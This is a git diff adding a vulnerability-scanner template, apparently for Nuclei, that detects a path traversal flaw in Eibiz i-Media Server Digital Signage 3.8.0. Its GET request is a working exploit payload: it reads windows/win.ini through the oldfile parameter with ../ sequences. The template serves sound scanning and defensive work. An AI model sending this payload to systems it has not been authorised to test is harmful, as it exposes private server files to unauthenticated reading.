diff --git a/eibiz-server-3-8-0-lfi.yaml b/eibiz-server-3-8-0-lfi.yaml new file mode 100644 index 0000000000..a0a6d83bf1 --- /dev/null +++ b/eibiz-server-3-8-0-lfi.yaml @@ -0,0 +1,23 @@ +id: eibiz-server-3-8-0-lfi + +info: + name: Eibiz i-Media Server Digital Signage 3.8.0 File Path Traversal + author: 0x_akoko + severity: high + description: An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the oldfile GET parameter. + tags: windows,lfi,eibiz + +requests: + - method: GET + path: + - "{{BaseURL}}/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null" + + stop-at-first-match: true + matchers: + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body